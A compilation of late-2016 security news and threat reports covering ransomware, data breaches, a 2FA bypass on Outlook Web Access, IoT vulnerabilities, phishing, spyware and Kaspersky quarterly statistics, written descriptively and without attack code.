The banking Trojan wasn’t the only cybercriminal activity the Lurk group was involved in. The group also developed the Angler exploit kit, a set of malicious programs designed to exploit vulnerabilities in widespread software to install malware. This exploit kit was originally developed to provide a reliable and effective delivery channel for the group’s malware. However, in 2013 the group started to rent out the kit to anyone who was willing to pay for it – probably to help pay for the group’s huge network infrastructure and large number of ‘staff’. The Angler exploit kit became one of the most powerful tools available on the criminal underground. Unlike the Lurk banking Trojan, which focused on victims in Russia, Angler has been used by attackers across the world – including the groups behind the CryptXXX and TeslaCrypt ransomware and the Neverquest banking Trojan (the latter was used against almost 100 banks). The operations of Angler were disrupted after the arrest of the alleged members of the Lurk group.

In Q3 2016, 45.2M unique malicious URLs were recognized by @kaspersky web antivirus components #KLreport #IT

The group was involved in other side activities too. For more than five years, the group moved from developing very powerful malware for automated money theft with Remote Banking Services software, to sophisticated theft involving SIM-card swap fraud, to becoming hacking specialists familiar with the internal infrastructure of banks.

Kaspersky Lab provided assistance to the Russian police in the investigation into the group behind the Lurk Trojan. The arrests marked the culmination of a six-year investigation by our Computer Incidents Investigation Team. You can read about the investigation here.


Hardly a month goes by without reports of ransomware attacks in the media: for example, a recent report suggested that 28 NHS trusts in the UK have fallen victim to ransomware in the last 12 months. Most ransomware attacks are directed at consumers, but a significant proportion target businesses (around 13 per cent in 2015-16). The Kaspersky Lab IT Security Risks Survey 2016 indicated that around 42 per cent of small and medium businesses became victims of ransomware in the 12 months up to August 2016.

One recent ransomware campaign demanded a massive two bitcoins (around $1,300) as a ransom. The ransomware program, named Ded Cryptor, changes the wallpaper on the victim’s computer to a picture of an evil-looking Santa Claus.


The modus operandi of this program (i.e. encrypted files, scary image, and ransom demand) is unremarkable, but the pre-history of this attack is interesting. It is based on the EDA2 open-source ransomware code, developed by Utku Sen as part of a failed experiment. Utku Sen, a security expert from Turkey, created a ransomware program and published the code online. He realized that cybercriminals would use the code to create their own cryptors, but hoped that this would help security researchers to understand how cybercriminals think and code, thereby making their own efforts to block ransomware more effective.

Ded Cryptor was just one of many ransomware programs spawned by EDA2. Another such program that we saw recently was Fantom. This was interesting not just because of its connection to EDA2, but because it simulates a genuine-looking Windows update screen


This is displayed while Fantom is encrypting the victim’s files in the background. The fake update program runs in full-screen mode, visually blocking access to other programs and distracting the victim from what’s really happening. Once the encryption has been completed, Fantom displays a more typical message.


There’s no doubt that public awareness of the problem is growing, but it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalising on this – this is clearly reflected in the growing number of ransomware attacks.

It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk. In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data. It’s never advisable to pay the ransom.

In Q3 2016, @kaspersky web #antivirus detected 12,657,673 unique malicious objects #KLreport #netsec

If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask your anti-malware vendor if they can help and check the No More Ransom website, to see if it holds the keys to decrypt your data. This is a joint initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky Lab and Intel Security – designed to help victims of ransomware retrieve their encrypted data without paying cybercriminals.

In a recent ‘ask the expert‘ session, Jornt van der Wiel, an expert from Kaspersky Lab’s Global Research and Analysis Team, provided useful insights into ransomware.

Data breaches

Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media. This quarter has been no exception, with data leaks from the official forum of DotA 2, Yahoo and others.

Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. Any organization that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically.

It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

Given the potential impact of a security breach, it’s hardly surprising to see regulatory authorities paying closer attention to the issue. The UK Information Commissioner’s Office (ICO) recently issued a record fine of £400,000 to Talk Talk for the company’s ‘failure to implement the most basic cyber security measures’, related to the attack on the company in October 2015. In the view of the ICO, the record fine ‘acts as a warning to others that cyber security is not an IT issue, it is a boardroom issue’.

The EU General Data Protection Regulation (GDPR), which comes into force in May 2018, will require companies to notify the regulator of data breaches, with significant fines for failure to secure personal data. You can find an overview of the regulation here.

We took a look back at the impact of the Ashley Madison breach, one year after the attack that led to the leak of customer data, offering some good tips to anyone who might be considering looking online for love (and good advice for managing any online account).

Cisco data leak – Job applications portal leaked personal information

7.11.2016 securityaffairs Incindent

Cisco data leak – Cisco has fixed a security vulnerability in the company Professional Careers portal that exposed personal information of the users.
Cisco data leak – Cisco has fixed a security vulnerability existing in the company Professional Careers portal that may have leaked personal information. Cisco has notified the issue to the affected users via mail in which it clarifies that just a “limited set of job application related information” was leaked from the mobile version of the website.

What happened?

According to the security advisory sent by CISCO to its users, data leakage was the result of an “incorrect security setting” placed after system maintenance on a third party site.

Cisco data leak includes name, username, password, email, address phone number, answers to security questions, education and professional profile, cover letter and resume text, and other personal information.

The incorrect configuration was exposing data from August 2015 to September 2015, and again from July 2016 to August 2016. The issue was discovered by an unnamed researcher that ethically reported it to the company.

“An independent security researcher discovered that a limited set of job application related information from the Cisco Professional Careers mobile website was accessible. Cisco’s investigation found this to be the result of an incorrect security setting following system maintenance.” reads the security note. “The issue was immediately fixed and passwords to the site have been disabled. Because Cisco takes its responsibility to protect information seriously, and since many people use the same passwords on multiple websites, we wanted to alert you to this incident. As a precaution, users of Cisco’s Professional Careers Website will need to reset their passwords at their next login by clicking “forgot my password”. “

Cisco confirmed that at the time it fixed the issue it has not found evidence of unauthorized accesses to its systems, however it discovered an unexplained connection to the server.

“We do not believe that the information was accessed by anyone beyond the researcher who found and reported the issue. However, there was an instance of unexplained, anomalous connection to the server during that time, so we are taking precautionary steps.” states Cisco.

In response to the incident Cisco precautionary reset password of the users of Cisco Professional Careers Website

“Upon learning this, the setting was immediately corrected and user passwords to the site were reset. Because Cisco takes its responsibility to protect information seriously, and since many people use the same passwords on multiple websites, we wanted to alert you. As a precaution, as a user of the Cisco Professional Careers Website, you will need to reset your password at their next login by clicking “forgot my password” reads the NOTICE OF DATA BREACH of the Cisco data leak.

cisco data leak

The exposed data could be used for social engineering attacks against the users. Cisco offered free 90-day fraud alerts on their accounts to the affected users.


Největší kybernetické hrozby v Česku

7.11.2016 Novinky/Bezpečnost Viry
Danger, Nemucod či Fraud. To jsou jména tří počítačových virů, před kterými by se měli mít tuzemští uživatelé na pozoru. Během uplynulého měsíce šlo totiž v Česku o nejhojněji se vyskytující nákazy vůbec. Vyplývá to z pravidelné měsíční statistiky nejrozšířenějších hrozeb, kterou pravidelně sestavuje antivirová společnost Eset.
Stejně jako v září byl i v říjnu nejčastěji skloňovanou hrozbou škodlivý kód Danger, který se šíří nejčastěji prostřednictvím nevyžádaných e-mailů. V uplynulém měsíci měl podle Esetu na svědomí každý třetí útok.

Danger přitom představuje pro počítačové piráty poměrně účinnou zbraň. Tohoto nezvaného návštěvníka využívají k tomu, aby potají otevřeli zadní vrátka do cizího operačního systému. Prostřednictvím nich pak mohou propašovat do napadeného stroje další škodlivé kódy.

Nejčastěji pak šíří vyděračské viry označované souhrnným názvem ransomware. Útoky těchto záškodníků mají prakticky vždy stejný scénář. Nejprve začnou šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit, jinak se ke svým datům údajně již nikdy nedostane. Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou.

Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. V některých případech to ale není možné.

Stejná taktika, jiný virus
Na prakticky stejném principu funguje také škodlivý kód Nemucod, který v říjnu obsadil s podílem 12,32 % druhou příčku v českých virových statistikách. Kyberzločinci jej tedy mohou využít k otevření zadních vrátek do systému a zároveň také k šíření dalších škodlivých kódů.

Třetí příčku v seznamu deseti nejčastěji odhalených nebezpečných kódů v říjnu zaujal trojský kůň PDF/Fraud. „Záměrem tvůrců je prostřednictvím tohoto malwaru přesvědčit uživatele, aby vyplnil a odeslal svoje citlivé osobní údaje,“ popsal Miroslav Dvořák, technický ředitel společnosti Eset.

K získání citlivých informací počítačoví piráti využívají celou řadu různých triků, uživatele například lákají na výhry v různých smyšlených soutěžích. I díky tomu se podařilo zmiňovanému škodlivému kódu získat ve statistikách téměř pětiprocentní podíl.

Deset nejrozšířenějších virových hrozeb v ČR – říjen 2016
1. JS/Danger.ScriptAttachment (35,02 %)
2. JS/TrojanDownloader.Nemucod (12,32 %)
3. PDF/Fraud (4,99 %)
4. Java/Adwind (3,58 %)
5. JS/TrojanDownloader.FakejQuery (3,03%)
6. DOC/Fraud (2,86 %)
7. JS/Kryptik.RE (1,95 %)
8. VBA/TrojanDownloader.Agent.BUX (1,54 %)
9. PowerShell/TrojanDownloader.Agent.Q (1,46 %)
10. JS/ProxyChanger (1,31 %)
Zdroj: Eset

Bypassing Two-Factor Authentication on Outlook Web Access
7.11.2016 securityaffairs Safety

Enterprises running Exchange Server using two-factor authentication on Outlook Web Access (OWA) could be hacked due to a design flaw.
New troubles for enterprises running Exchange Server, two-factor authentication implementations on Outlook Web Access (OWA) could be easily bypassed due to a design flaw.

An attacker can bypass two-factor authentication to access email inboxes, calendars, contacts and other sensitive data of targeted enterprises.

The weakness is related to the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA, but this is not protected by two-factor authentication.

The attackers can then hack OWA server by targeting EWS that shares the same port as Outlook Web Access.

outlook web access hack

The design issue disclosed last week by researcher Beau Bullock from Black Hills Information Security who privately reported it to Microsoft on Sept. 28.

Bullock explained that the principal problem is that Outlook Web Access and Exchange Web Services run on the same web server and are both enabled by default, and often enterprises ignore it.

Even enabling 2FA on OWA, EWS is still exposing a single factor authentication for the same infrastructure.

In his test, Bullock set up an OWA server protected by Duo for Outlook 2FA, then he targeted the EWS on the same server using a test account’s credentials.

Bullock used a tool called MailSniper that he developed for searching mailboxes for sensitive data in a Microsoft Exchange environment.

“At DerbyCon 6.0 I released a tool called MailSniper for searching mailboxes for sensitive data in a Microsoft Exchange environment. MailSniper utilizes Exchange Web Services (EWS) when connecting to an Exchange server to retrieve messages from a user’s inbox. EWS is a web-based API enabled on Exchange servers that Microsoft recommends customers use when developing client applications that need to interface with Exchange. ” Bullock wrote a blog post.

Below a video PoC published by the expert:

Summarizing, Bullock demonstrated that the lack of 2FA for Exchange Web Services could be exploited by attackers to hack into Outlook Web Access server.

“In conclusion, it appears that Outlook portals that are being protected by two-factor authentication might not be covering all of the authentication protocols to Microsoft Exchange. In this post it was demonstrated that Exchange Web Services is not being protected by a popular two-factor authentication software, and it was possible to still read emails of a user after only obtaining their login credentials. Exchange has other services that might have a similar problem such as MAPI over HTTP, and Autodiscover. I tested against one third-party 2FA software, and Microsoft’s own Azure Multi-Factor authentication but I’d imagine others likely have the same problem.” concluded Bullock.

Databases of Indian embassies leaked online. Too easy hack them

6.11.2016 securityaffairs Security

The databases of the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya were leaked online by two grey hat hackers.
Today I was contacted by a security pentester who goes online with the moniker Kapustkiy who revealed me to have breached the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya. Kapustkiy and his friend Kasimierz (@Kasimierz_) told me that they were initially white hats in the past, but decided to change to grey hats to get the media attention and force many administrators of websites online to seriously consider cyber security.

The duo exploited SQli injection flaws in the targeted websites and gain access to the databases. They confirmed me that many Indian embassies are vulnerable to such kind of attack.
indian embassies hacked
They breached a total of 7 databases containing names, surname, email addresses and telephone numbers.

The duo leaked online the content of the hacked databases. The data are available on Pastebin at the following URL

Unfortunately, such kind data leaks are very dangerous, especially for the security of diplomatic personnel. We cannot forget that the personnel working in the embassies are privileged targets of nation-state actors conducting cyber espionage campaigns.

In May, security experts from PaloAlto Networks collected evidence that the Operation Ke3chang discovered by FireEye in 2013 is still ongoing. Back in 2013, the security researchers at FireEye spotted a group of China-Linked hackers that conducted an espionage campaign on foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang,’ and in March the same hacking crew was spotted targeting personnel at Indian embassies across the world.

The Operation Ke3chang is only one of the numerous campaigns that targeted diplomats worldwide, for this reason, it is important to ensure a proper security posture to secure data managed by embassies across the world.

Now the data belonging to the personnel working in the Indian Embassies in the above countries are available online.

I had no opportunity to check the authenticity of the data, I tried to reach the embassy online but at the time I was writing the website of the Indian Embassy in Rome is unavailable.

How to Exploit Belkin WEMO gear to hack Android devices

6.11.2016 securityaffairs Android

Belkin’s WeMo home automation firmware that’s in use in several IoT devices has recently been found vulnerable to an SQL injection.
Belkin’s WeMo home automation firmware that’s in use in its light bulbs, switches, security cameras, coffee makers and room heaters has recently been found vulnerable to an SQL injection.

The hack allows root privileges to a third party, which already has access to the devices’ local network.

Researchers at Virginia based Invincea Labs discovered the vulnerability and also warned of a related knock on exploit path which allows for compromise of the Android device used to control the Belkin home automation systems.

The flaw exploits a weakness in field validation by allowing a threat actor to inject malicious JavaScript via the device name field.

Scott Tenaglia, Research Director at Invincea stated that the flaws were previously unknown and not linked to earlier flaws in the WeMo home automation products.

Invincea Labs privately disclosed the flaws on Thursday the 11th of August with Belkin publicly announcing the vulnerability the next day.

On September the 1st, Belkin released a patch, which remedied the code injection vulnerability on the Android app. A further patch was released by Belkin to fix the WeMo appliances on November the 1st

It’s unknown how many WeMo products are vulnerable to this particular weakness, however, in 2015 it was reported that Belkin WeMo had approximately 1.5 million products in use.

Researchers at Invincea stated that every one of their devices that allow for remote control or administration is vulnerable to the attack.

In order to exploit this particular set of vulnerabilities, a malicious actor would first have to gain access to the local network where the smart devices were located. They would then have to leverage the shared network infrastructure in order to move the malicious code from their entry point to the vulnerable devices.

According to Tenaglia “The goal of the attacker is to hop from one device – a PC that can be later disinfected – to another device that can’t be protected – such as an IoT device,”. He then went on to explain, “Once the attacker has access to the IoT device they can do whatever they want from downloading Mirai-type malware for creating a botnet or just control the device in question. They can also infect or re-infect any PC on the same network with malware of their choice.”

Invincea Labs tested their concept by infecting a WeMo device with a malicious PowerShell script and from there open a telnet connection on the device and have it supply a root shell to requesters.

Tenaglia also stated that once infected the device could be configured to deny requests to patch the system and default setting reset attempts unless patched with the recently released firmware update.

Once the access had been granted the researchers found that the attack could progress to target Android devices running the WeMo app used to control the home automation devices.

“This is the first time anyone has discovered a way for IoT devices to hack your phone”, according to Tenaglia.


The vulnerability affects devices by placing unsanitized JavaScript into the name fields of the device, instead of only being recognized as a string the malicious code is executed instead.

“Every WeMo device can be assigned a name. What we found is you can set the name property in the device to a malicious string. The malicious string contains JavaScript code. And when the Android app requests the name of the devices it needs to connect to, it will download the malicious JavaScript code that is the name of the device, and execute the code,”

Utilizing the hack in the lab environment Tenaglia reported that they were able to both access the photo gallery on the phone as well as activate the GPS beaconing system, allowing third parties to track and locate the device.

“All this hack allows us to do is run code in the context of the WeMo app. We do not have root access to the phone,” Tenaglia said. Furthermore, access to the Android device is limited to only when the app is active or running in memory on the phone. Once the WeMo remote app is shut down, access is terminated. “What we have is an in-memory infection. The code does not persist on the phone when you force quit the app. However the name of the device is still that malicious string. So when you connect to that device again the reinfection occurs,”

More Insights On Alleged DDoS Attack Against Liberia Using Mirai Botnet
6.11.2016 thehackernews Attack
On Thursday, we compiled a story based on research published by a British security expert reporting that some cyber criminals are apparently using Mirai Botnet to conduct DDoS attacks against the telecommunication companies in Liberia, a small African country.
In his blog post, Kevin Beaumont claimed that a Liberian transit provider confirmed him about the DDoS attack of more than 500 Gbps targeting one undersea cable servicing Internet connectivity for the entire country.
Later, some media outlets also confirmed that the DDoS attack caused Internet outage in some parts of the country, citing ‘slow Internet’ and ‘total outage’ experienced by some local sources and citizens.
"The DDoS is killing our business. We have a challenge with the DDoS. We are hoping someone can stop it. It's killing our revenue. Our business has frequently been targeted" an employee with one Liberian mobile service provider told PC World.
Network firm Level 3 confirmed Zack Whittaker of ZDNet that it had seen attacks on telecoms companies in Liberia making access to the web spotty. Other reports suggested mobile net access was affected too.
"At first I thought it was a problem with my internet provider, which often suffers from slow speeds. But this feels more serious. Even when you do get online, the connection repeatedly cuts out." BBC Africa's Jonathan Paye-Layleh in Liberia shared his experience.
Of course, based on the high concern, the story went viral and Kevin's research was covered by other media outlets, including BBC, PC World, The Guardian, Forbes, IBtimes, Quartz, Mashable, although few of them interpreted the incident incorrectly and claimed that the attack took down the entire country's Internet.
In our article, we explicitly mentioned multiple times that criminals are "using Mirai Botnet to shut down the Internet for an entire country" and "trying to take down the Internet of Liberia."
The only mistake in our previous article was the image caption which briefly said, "DDoS takes down entire country offline." We apologize to our readers for an incorrect image caption, which has now been corrected.
Latest Insights On Liberia DDoS Attack Story
After Kevin’s story, some new developments with more insights have appeared.
Doug Madory, the Director of Internet Analysis at Dyn Research wherein ed that DYN and Internet-infrastructure company Akamai have no data that supports any nationwide Internet outage in Liberia.
The Hacker News has also been contacted by Kpetermeni Siakor, who manages infrastructure at the Liberia Internet Exchange Point, stating that only Lonestarcell MTN, one of the country's four major telecommunication companies, faced 500 Gbps of DDoS attack for a short period, which was mitigated successfully.
"From inspecting our logs at the Liberia IXP, we didn't see any downtime in the past three weeks. The general manager of the CCL also couldn't confirm any issues with the ACE cable," Siakor said.
In our previous article, the primary concern surrounds around two facts: The Mirai Botnet capability and ACE submarine fiber-optic cable capacity.
Where just 100,000 Mirai bots were successful in knocking down the majority of Internet Offline two weeks ago, how easy it could be for millions of bots to DDoS the ACE submarine fiber-optic cable, whose total capacity is just 5.12 Tbps that is being shared between all of the 23 countries, including Liberia.
So, when we said that someone was trying to take the entire country down, we meant that cyber criminals have such capacity to do so, and since they have targeted one network operator, does not mean they would not attack other network operators that could impact the Internet services in the country.
Mirai Malware Threat: Protect Your IoT Devices
The incidents involving the Mirai malware is extremely worrying because it can take over insecure cameras, DVRs, and routers, which are widely available all around the world – Thanks to lazy manufacturers and customers.
Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks.
So, the best way to protect yourself and your devices is to be more vigilant about the security of your smart devices.
In our previous article, we provided some basic, rather practical, solutions that will help you protect your IoT devices from becoming part of the Mirai botnet. You can also check also yourself if your IoT device is vulnerable to Mirai malware.

Watch out! A new LinkedIn Phishing campaign is spreading in the wild
6.11.2016 securityaffairs Social
Experts from Heimdal Security reported a recent LinkedIn phishing campaign aiming to collect confidential information from unsuspecting users.
Phishing attacks continue to be a serious threat, crooks exploit paradigms such as social medial platforms and mobile in the attempt of stealing sensitive data.According to 2015 Verizon Data Breach Investigation Report, 23% of email recipients open phishing messages and 11% click on malicious attachments … and this is just the tip of the iceberg.

Experts at Heimdal Security reported a recent LinkedIn scam aiming to collect confidential information from unsuspecting users.

The attack vector is an email like this:

linkedin phishing email

Wait, LinkedIn is requesting files from me? LinkedIn is requesting to send documents via email to confirm my identity?

Unfortunately, many users fall victims of this absurd invite.

The email asks for a payment receipt, so premium LinkedIn users could fall into the trick of sending their payment information.

Giving a close look at the sender’s email address

postmaster [@]

It is easy to notice that the message doesn’t come from the professional social media platform.

The domain used by phishers http : [//] is an empty WordPress website, likely a compromised website used for the campaign.

The message also requests victims to upload the document to a Dropbox folder, that is alarming, none will ask you to upload your ID document to a cloud storage platform.

“The Dropbox link is clean when scanned through VirusTotal, which shows that this recent campaign has not yet been picked up by antivirus solutions.” states the analysis published by Heimdal Security.

Another element that should raise suspicion is the time limit referred in the email, a classic social engineering approach used to trick victims into following the instructions provided in the message.

Now let’s analyze the link in the top right corner of the message, it leads to a password reset page, secured with HTTPS.

“The link is placed on the recipient’s name and leads to a password reset page, secured by HTTPS. Strangely enough, this is actually a safe page, which could prompt the email recipients to believe that the rest of the email is valid and legitimate as well.” continues the analysis.

Going forward, the experts noticed many other strange issues, I invite you to give a look at the analysis. Awareness of such kind of scams is important to make them ineffective.

To report phishing messages you’ve received, please email

The US Government is ready to hack back if Russia tries to hit Presidential Election
6.11.2016 securityaffairs Cyber
Documents and testimonials collected by the NBC news confirm US Government cyber army is ready to hack back if Russia tries to disrupt Presidential Election
The alleged interference of Russian state-sponsored hackers into the 2016 Presidential election is triggering the response of the US.

For the first time, a member of the US Presidential Staff has treated another country of a cyber attack is response to the hacking campaigns that are targeting across the months the US politicians.

The Office of the Director of National Intelligence and the Department of Homeland Security have issued a joint security statement to accuse the Russian government of a series of intrusions into the networks of US organizations and state election boards involved in the Presidential Election.

“The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations. The recent disclosures of alleged hacked e-mails on sites like and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts. These thefts and disclosures are intended to interfere with the US election process” reads the statement.

“We will take action to protect our interests, including in cyberspace, and we will do so at a time and place of our choosing,” a senior administration official told AFP.

“The public should not assume that they will necessarily know what actions have been taken or what actions we will take.”

Two weeks ago, the US Vice President Joe Biden during an interview with NBC explained that “message” would be sent to Russian President Vladimir Putin over the alleged hacking.

It is a historical declaration, for the first time in a diplomatic context, a member of a government invoke a cyber attack as a deterrent measure.

“Vice President Joe Biden told “Meet the Press” moderator Chuck Todd on Friday that “we’re sending a message” to Putin and that “it will be at the time of our choosing, and under the circumstances that will have the greatest impact.” reported the NBCnews.

“When asked if the American public will know a message was sent, the vice president replied, “Hope not.“”

According to NBC, the CIA was preparing a retaliatory cyber attack “designed to harass and ’embarrass’ the Kremlin leadership.”

While cyber security experts, politicians, and military officials are questioning about a proportional response to the alleged Russian interference, the US cyber army has already penetrated Russian electric grid, telecommunications networks and also the Russia’s command systems.

The news was confirmed by a senior intelligence official and top-secret documents obtained by the NBC News

“U.S. military hackers have penetrated Russia’s electric grid, telecommunications networks and the Kremlin’s command systems, making them vulnerable to attack by secret American cyber weapons should the U.S. deem it necessary, according to a senior intelligence official and top-secret documents reviewed by NBC News.” reported the NBC News.

Russia, China, US, Germany and almost any other country are improving their cyber capabilities. In many cases, security experts have introduced the concept of militarization of the cyberspace indicating the effort spent by governments to establish a form of dominance by using malware and hacking tools against critical infrastructure and computer systems of foreign governments.

The Stuxnet cyber weapon has demonstrated the efficiency of digital weaponry, alone or as an adjunct to conventional attacks.

Recently Russian hackers were accused of being responsible for a large number of espionage campaigns against governments and private companies worldwide.

Of course, the US cyber army operated in the same way for the dominance in the cyberspace, documents Leaked by Snowden and examined by Der Spiegel magazine reveals that the NSA is now preparing for future dominance in cyberspace.

The Equation Group is probably one of the maximum expression of the NSA cyber capabilities. The NSA-linked group used for its campaigns a large number of zero-day exploits and sophisticated hacking tools.

Now the documents reviewed by the NBC News confirm that significant effort spent by the US Government against Russia.

The US intelligence doesn’t believe the Russian hackers will target national critical infrastructure instead it fears Russia could disrupt the presidential election by releasing fake documents or spreading misinformation with PSYops campaigns.

The NBC News confirmed the US Government is establishing a specific response team to prevent and repel any attack on the presidential election. Experts say it is an unprecedented effort, the US cyber army is ready to use its cyber weapons against any enemy that will try to interfere with the political appointment.

“U.S. military officials often say in general terms that the U.S. possesses the world’s most advanced cyber capabilities, but they will not discuss details of highly classified cyber weapons.” wrote the NBC News.

“James Lewis, a cyber expert at the Center for Strategic and International Studies, says that U.S. hacks into the computer infrastructure of adversary nations such as China, Russia, Iran and North Korea — something he says he presumes has gone on for years — is akin to the kind of military scouting that is as old as human conflict.”

“This is just the cyber version of that,” he said.

In 2014, the NSA director Adm. Mike Rogers told Congress that U.S. adversaries are performing electronic “reconnaissance” on a regular basis.

“All of that leads me to believe it is only a matter of when, not if, we are going to see something dramatic,” he said at the time.

presidential election us-army-cyber

On the other end, the NSA regularly penetrates foreign networks to gather intelligence.

“You’d gain access to a network, you’d establish your presence on the network and then you’re poised to do what you would like to do with the network,” Gary Brown, a retired colonel and former legal adviser to U.S. Cyber Command, told NBC News. “Most of the time you might use that to collect information, but that same access could be used for more aggressive activities too.”

The senior US intelligence official confirmed that the U.S. could take action to shut down some Russian systems in case of Russian cyber attacks. He referred a practice called by security experts active defense or hack back.

“I think there’s three things we should do if we see a significant cyber-attack,” he said. “The first obviously is defending against it. The second is reveal: We should be publicizing what has happened so that any of this kind of cyber trickery can be unmasked. And thirdly, we should respond. Our response should be proportional.” Retired Adm. James Stavridis told NBC News.

Brown highlighted the lack of an exhaustive and shared doctrine around cyber warfare.

“Cyber war is undefined,” Brown added. “There are norms of behavior that we try to encourage, but people violate those.”

Commercial Exaspy spyware used to target high-level executives
6.11.2016 securityaffairs Android
Security researchers at Skycure have discovered a new commodity Android Spyware, dubbed Exaspy, targeting high-level executives.
While in many countries the number of Smartphone and Tables is greater of desktop PC, new threats are targeting mobile devices.

Researchers at Skycure have discovered a new strain of Android spyware, dubbed Exaspy, that has been used in targeted attacks against high-level executives.

Researchers from Skycure discovered an instance of the Exaspy malware that was installed on an Android 6.0.1 device owned by a Vice President at an unnamed company.

One of the most interesting aspects of this Android malware is that it requires manual installation on the target device, this implies that attackers have to physical access the smartphone.

Below the analysis provided by Skycure, it is interesting to note that the Exaspy malware needs admin rights for its execution and a license number.

“Interestingly, this malware actually requires an end user to perform the initial installation steps, meaning physical access to the device is required at installation time. Here is how the app installs itself when it runs for the first time:

Malware requests access to device admin rights
Asks (nicely) for a licence number
Hides itself
Requests access to root (if the device is rooted and managed through popular rooting apps). Once granted, it installs itself as a system package to make its uninstallation process harder.”

Once the malware is installed on the device, it is able to access the victim’s chats and messages (SMS, MMS, Facebook Messenger, Google Hangouts, Skype, Gmail, native email client, Viber, WhatsApp, etc.).

On the infected device, the app runs under the name of Google Services leveraging the package name “,” this allows it masquerading the legitimate Google Play Services.

The Exaspy malware is able to record surrounding audio and victim’s calls, it can access photos on the device, it can take screenshots, and access many other user data, including the browser history and call logs.

The malware tries to transfer stolen data to C&C in presence of connectivity and waits for commands.

“The CNC (command and control) server is able to perform requests of its own, which include:

Monitor and transmit local files, such as photos and videos taken.
Execute shell commands, or spawn a reverse shell, which allows the app to elevate its privileges using exploits that are not included in the basic package.”
The spyware communicates with a server at hxxps:// hosted in Google Cloud, it can download updates from the hard-coded URL hxxp://

Mobile malware is a privileged instrument for hackers that attempt targeting high-profile individuals, recently experts discovered another commercial spyware called Pegasus that was developed by the Israeli firm NSO Group.

I have forgotten to tell you that the Exaspy spyware is being sold as a $15-a-month turnkey service online.

What is the next commercial spyware?

IT threat evolution Q3 2016. Statistics
5.11.2016 Kaspersky Analysis

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Q3 figures

According to KSN data, Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.
45,169,524 unique URLs were recognized as malicious by web antivirus components.
Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects: scripts, exploits, executable files, etc.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 1,198,264 user computers.
Crypto ransomware attacks were blocked on 821,865 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 116,469,744 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected:
1,520,931 malicious installation packages;
30,167 mobile banker Trojans (installation packages);
37,150 mobile ransomware Trojans (installation packages).
Mobile threats

Q3 events

Pokémon GO: popular with users and hackers

One of the most significant events of the third quarter was the release of Pokémon GO. Of course, cybercriminals could not ignore such a popular new product and tried to exploit the game for their own purposes. This was primarily done by adding malicious code to the original app and spreading malicious versions via third-party stores. This method was used, for example, to spread Trojan-Banker.AndroidOS.Tordow, which exploits vulnerabilities in the system to obtain root access to a device. With root access, this Trojan protects itself from being deleted, and it can also steal saved passwords from browsers.

But perhaps the most notable case of Pokémon GO’s popularity being used to infect mobile devices involved fraudsters publishing a guide for the game in the official Google Play store. The app turned out to be an advertising Trojan capable of gaining root access to a device by exploiting vulnerabilities in the system.

We later came across two more modifications of this Trojan, which were added to Google Play under the guise of different apps. According to Google Play data, one of them, imitating an equalizer, was installed between 100,000 and 500,000 times. in the official Google Play store

Interestingly, one of the methods used by the cybercriminals to promote the Trojan was a company that pays users for the installation of advertising apps.


Screenshot of the app that prompts the user to install the Trojan for 5 cents

According to this company’s rules, it doesn’t work with users whose devices have root access. The users may be looking to earn some money, but they end up with an infected device and don’t actually receive any money, because after infection the device gains root access.

Ad with a Trojan

The most popular mobile Trojan in the third quarter of 2016 was Trojan-Banker.AndroidOS.Svpeng.q. During the quarter, the number of users attacked by it grew almost eightfold.

Over 97% of users attacked by Svpeng were located in Russia. The attackers managed to make the Trojan so popular by advertising it via Google AdSense – one of the most popular advertising networks on the Russian Internet. Many popular sites use it to display targeted advertising. Anyone can pay to register their ad on the network, and that was exactly what the attackers did.

Along with the advert, however, they added the AdSense Trojan. When a user visited the page with the advert, Svpeng was downloaded to their device.

Bypassing protection mechanisms in Android 6

In our report for the second quarter of 2016 we mentioned the Trojan-Banker.AndroidOS.Asacub family that can bypass several system controls. Of special note this quarter is the Trojan-Banker.AndroidOS.Gugi family that has learned to bypass the security mechanisms introduced in Android 6 by tricking the user. The Trojan first requests rights to overlay other applications, and then uses those rights to trick the user into giving it privileges to work with text messages and to make calls.

Trojan ransomware in the Google Play store

